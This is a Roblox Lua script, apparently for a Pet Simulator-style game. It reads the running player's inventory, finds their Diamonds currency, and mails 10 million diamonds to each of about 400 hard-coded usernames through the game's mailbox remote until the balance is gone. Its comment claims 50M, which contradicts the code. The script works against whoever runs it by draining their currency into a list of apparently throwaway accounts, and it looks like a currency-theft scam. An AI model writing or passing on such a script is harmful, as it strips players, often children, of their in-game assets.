local Save = require(game:GetService("ReplicatedStorage").Library.Client.Save)
local player = game.Players.LocalPlayer
local leaderstats = player.leaderstats

local currentGemCount = leaderstats["💎 Diamonds"].Value
local saveData = Save.Get()
local Inventory = saveData["Inventory"]
local amount = 10000000 -- 50M GEMS

-- List of usernames to send to
local usernames = {
"NualaFQ4bIup",
"Vojislav88m0Rw",
"ZoyanRqiFf7",
"Tynan8a7xe2d",
"AnitaYqesw0",
"Anelia8m7LJ9",
"ZsaZsaSL0XDn",
"ShonahyqMhU",
"RainierYAdJGq",
"SolomonhWAh6O2",
"Thorsten5QXjmg",
"Kian30s1A2j",
"JaylinqkpBeW",
"IshmaelRM5DUes",
"Rosalindahh1Kvi",
"Nexora6",
"Soltraz8",
"CrynixYT3",
"Jupinox6",
"Zenthrix4",
"GriffynFire",
"Axtrolyn",
"PhoeniZap",
"UnicornHowl2",
"HydraRacer2",
"DragonPouncer7",
"SpriteSparkle03",
"BasiliskDash",
"CookieTrekz",
"YetiWander",
"IceCreamZap1",
"PancakeSkater0",
"NachoFlare0",
"JellyToastie1",
"MuffinBlitz4",
"SodaZoomie",
"SkyDolphinz",
"DeepDiverX",
"PizzaSneaker2",
"MarshieNoodle",
"Naga2UA8kgT",
"Yamirqua7mA",
"SyafiqR3iISN",
"Garcia2eYORM",
"Isidroyg8I8k",
"WilfriedEi7ypj",
"ThaismypLws",
"Elita56uMF",
"IshaanhR9VI3",
"EileenEifUP3",
"TamicYLRKY",
"LuellasVNFU",
"RaheemSwyWS",
"Yash2Ubh9I",
"Yvonne1DRfqV",
"Alden5QHnX",
"ZohraKGRLQj",
"XyliaDqk0Hb",
"Rosaliaeh3c2",
"BenedictGMWKJy",
"Soma3fLIj",
"VicenteMa4x6",
"Verona124xdU",
"Dennyxkmyt",
"RochikFAST",
"QadiraOnAMx",
"Zeusnp6Hw",
"Yunah6D4v",
"NethaniadFAkY",
"WilburnPTnYB",
"CelestinewSVDmf",
"SarahTgpF33",
"SloanbkYsj",
"Pyotr9F6SN",
"SyakiraUCWXY",
"Weslysh1Lq",
"CleoHve4O",
"ElladineRjEuB",
"MarcususGqT",
"CristobalFxrnSw",
"HamidKhr58H",
"UlapoYsxNTJ",
"GeenasFETds",
"AlicjaHjV2Tq",
"Devina046O5",
"Gaelx63ke",
"ErisA8BFN",
"GarynATi9Ap",
"MayaraB7qbCL",
"RigobertoBbaxx",
"YoshikoUe7RCF",
"OdettevcUbjU",
"CristobalYVbgD",
"ValentinoRu3NNuF",
"Lando8xdhJ",
"Harrietty9uDP",
"Zinnia7Puax",
"AnitaXXr6Y",
"Thora307xd",
"ShreyaYKx9gL",
"WidadEvU5k",
"KunzanggMyeD",
"MyungWaH6dO",
"Pilarht9fK",
"HaileyHODC2R",
"UrielJvI8GP",
"Jaelyn8W4Wt",
"NikitaiKM7S5",
"Godfrey4cGLg",
"TashafeNw5u",
"PrasadH2n7N",
"ScottCrWSi",
"SapphiregIxr69",
"StanislausC3sBRW",
"JasperS715E",
"Julianne41Pkda",
"AlexisxveQMk",
"Maxim2pTYO",
"Nurlan1k67qj",
"MaheerankI2J",
"Vestah2TFy",
"Halima9yswJR",
"TempleAjuvt",
"Hughnsd9x",
"KeitaAc9pc",
"Zarin6rj1Y",
"XylinaEh2ini",
"TroyRwiyB",
"TriciaWjQVN",
"JillianqehaDy",
"EstellartSJa",
"KishoreBkN8i8",
"Thanosj4R82t",
"Kaitlynu2nUm",
"TalibiS5YV",
"ZalmanFIVUJ",
"TiborC2FHS",
"HazelpajVV",
"AlishaLIKwc0",
"ZerlinaxrfX2",
"KeyonuOMOn",
"Ignacia9YgiJg",
"BrizioNREvKC",
"Zeenad4jT9",
"ArminaOOJf4T",
"DristanckePV",
"Alhena8OiVh",
"SynthiaJkf0V",
"YlvausMKaA",
"VanyaU2PQJ",
"YakovM8Ihw4",
"MelisandrenCib8y",
"Morrigan0cdLRd",
"KamranuW49I",
"LeonelhJReh",
"LucerofRFV7u",
"BrooklynyKPi7X",
"RitaTtxVL",
"XerxesCYXhfC",
"Prasanna2sgRWR",
"RobinFwC74h",
"Meirn3AxWa",
"ThaddeusimNyjp",
"RiaBRAScO",
"AmeliaSi5dV",
"Natsumi0tskyF",
"AkhtarTda024",
"HilarioxG2Cd",
"MillicentgCr5Mk",
"Takayaf5sAEn",
"TayaswgVPN",
"SchuylerDTu4c8",
"MunirrvQKwY",
"Ptolemyhq0iTH",
"ReemG6pEVg",
"ChristianoBFLmtV",
"Wahid3sWWCV",
"AlbertocVvGuGM",
"ChristalagXYAsg",
"Kolby79IdSB",
"Seneca9SFDWU2",
"RikauMiV9RN",
"OniasEhvBmV",
"KatiaxAMmfeJ",
"RyukiC7imQKO",
"Nemanja9sbtGj",
"ValdemarUFQTb8",
"Tessa1JUGGvO",
"TrentWwFmULG",
"TayaQx8Q8y",
"VardantGubau",
"KierraVDg7pVO",
"ViktorBrLiXIS",
"YannickxmILryd",
"Teomanu8v6Lbs",
"TeoqYCNSW1",
"WinManSfGi",
"RashadrfBBOTW",
"ZaidnIJ1rX",
"ElianahR8r3V",
"AdindaA29n7sq",
"NesrinkEhHmF",
"XimenaVHtVdkr",
"TalibvrK3eA",
"WincentximmXt",
"Sakina0C8s6Yn",
"YulioGjuYTq",
"Zuleika6Hh4Gvc",
"NessievQ9M5J",
"Nirav6LRjRi",
"MandiraMi0NJg",
"LysanderxPFq1j",
"AkemiNsgbi6k",
"Tasia6AtOkw",
"Cloptrenzu33",
"Jabbwinto71",
"Slintbozza31",
"Blaxtrufi41",
"Zeppzorla53",
"Frubbkinzo70",
"Zofflimpa14",
"Kremtolvi90",
"Snobfrakto83",
"Quimflorzo04",
"Drizzbunto26",
"Skurmzako25",
"Flontkarmi08",
"Glomtwazi27",
"Mibzoltra75",
"Snivmorta46",
"Wrinklazo06",
"Zektrabbo67",
"Snerdliko44",
"Brintulvo25",
"Jortnuzzi12",
"Gorbwinty74",
"Plintorzy11",
"Trofflinza02",
"Crambliff38",
"Yuffwonti33",
"Droffzenko85",
"Plombvick92",
"Gloptrazi06",
"Plurnvakzi05",
"Xorflazzi66",
"Wubbnarki85",
"Broltrikz41",
"Klakdorpy56",
"Fazzminto89",
"Glinzopra09",
"Slermboty34",
"Zontakril63",
"Miptrazik87",
"Frowbizko26",
"Tuzzplank10",
"Varklembo04",
"ZoodlePuff93",
"SnorkyFizz28",
"TangleDart41",
"MunchZorp12",
"JiffyMeep19",
"ClompSnazz809",
"GloopSnack35",
"BlipCrate57",
"WibbyToad67",
"QuibbleJot24",
"TwerpyFluff98",
"NoodleBash398",
"SnerkleYomp13",
"MuffSquash22",
"DabbleToot75",
"BoingPebble88",
"YaffyGobble15",
"WagglyNom04",
"SprocketNug88",
"NorkleZump03",
"GribblyWhoof68",
"CrankyPuff94",
"SnobzyPloop31",
"PloopNacker36",
"LoopyThunk455",
"DabbleRazz13",
"ScootCrumb74",
"RazzleThunk559",
"VoomQuokka07",
"NibletMash82",
"HiccupWink023",
"TrickleWhomp03",
"PompFizz91",
"WaffleCrick38",
"KrumbleWig21",
"YibbleTuff30",
"SneebTwirl85",
"FlipMarmot19",
"FizzleRug28",
"SplatZing18",
"HootZibble11",
"BrumbleJazz66",
"MuddleFlute59",
"WhumpNugget64",
"ZumpyToffle11",
"SqueegeeTwist21",
"PoofWander79",
"HonkNoodle34",
"SkritchWomp58",
"NubbyGlimp09",
"GurglePiff87",
"MunchWobble97",
"FloopyDrift05",
"GlimmerClunk70",
"ChunkFizzler84",
"WhiffyMutt07",
"DaffySnub91",
"SpindleGlorp28",
"ZippityCrank16",
"NombleWhizz90",
"GrizzleSpork23",
"BloopyMangle08",
"SplooshPatter45",
"DippleThunk97",
"SnoodleRomp18",
"BlingySploosh38",
"TwibbleGunk29",
"PufflyZink92",
"WompleYomp43",
"FrootleNomper59",
"SplotZorkee81",
"ScoobyFlanch07",
"ClatterSnib75",
"ClinkBuzzard12",
"ArcticFoxie02",
"EpicWhirlwind6",
"PandaashY0",
"TurboTiger228",
"FluffyFalconss",
"GatorSprinter",
"CobaltRaccoon",
"MysticPuma0",
"RuneHunterZ",
"SwordBlazer14",
"GoldenPengu1",
"HowlinWolfie1",
"RoboBlitz9000",
"SpaceOrbitron",
"MechaPilotX",
"AstroNovaR2",
"HyperNeonX3",
"StarliteVortex",
"NovaCharger9",
"PlasmaPulseZ7",
"GalaxyWarden26",
"MochiDreamz8",
"GummyTwinkle3",
"PeachyNoodle3",
"MarshmallowMew_2",
"WaffleFluffz",
"BubblePuppyz2",
"XxFrostBytexX09",
"DarkPulseYT79",
"SprinkleKittenz3",
"KawaiiSn0wball_0",
"RazorNovaX",
"IceVandal2",
"CryptShad3",
"BlazeViper68",
"DonutPilot0",
"PizzaDash32",
"SockBanditz",
"BananaModeX_5",
"TacoHelmet5",
"FireWhirlX",
"BobaRocket_0",
"PineappleZoom34",
"EarthCrafterYT",
"WindVolt74",
"IceNovaZ",
"LavaUnicorns_9",
"AquaGhost850",
"StormWielder4",
"EmberSky19",
"TempestTrek",
"GlacialRift0",
"CyanFrosted",
"IndigoDrift8",
"MintySurge",
"BlazingRedz1",
"VioletHowler",
"GoldenZapX",
"NeYell_6",
"AzureDash8",
"SilverSnackz",
"ProSniperXx00",
"FPSBrawler4",
"LootGrabberZ",
"SkyBlockyYT7",
"CoralBlizz8",
"BuildCrafter14",
"NinjaDodgeYT",
"PixelGrindz8",
"ObbyKingX83",
"WinterMuffinz2",
"GameMageYT0",
"FallBlizzardz",
"FrostPineZ",
"SunnyToaster0",
"SummDa25",
"BreezyMoonX",
"SpringChirp",
"SnowBeanYT8",
"LeafyZapz",
"RainyShineZ3",
"Blixzor9",
"Trexlyn4",
"BubbleBlaster563",
"RBLXNinjo",
"SpawnDodger",
"AquaGlideYT",
"SeaWaverZ9",
"CloudSailor18",
"MistyFins",
"StormyPilot6",
"ObbyRunnerZ8",
"Tycolier3",
"LunarSurfer4",
"RoboxCrafter3",
"ScriptGlitchZ",
"OofTrekker",
"BuilderDaYT",
"BloxBattler_8",
"DevPlayzYT19",
}

-- Get Diamond UID
local diamondUID
for Class, Inv in pairs(Inventory) do
    if Class == "Currency" then  
        for uid, Item in pairs(Inv) do
            if Item.id == "Diamonds" then  
                diamondUID = uid
                print("Diamonds UID found:", diamondUID)
                break
            end
        end
    end
end

-- Send to each user if gems are enough
if diamondUID then
    for _, username in ipairs(usernames) do
        if currentGemCount >= amount then
            local args = {
                [1] = username,
                [2] = "Here you go buddy",
                [3] = "Currency",
                [4] = diamondUID,
                [5] = amount
            }

            print("Sending to:", username)
            game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox: Send"):InvokeServer(unpack(args))

            currentGemCount -= amount
            task.wait(1)
        else
            warn("Not enough gems left for user:", username)
        end
    end
else
    warn("Diamond UID not found.")
end
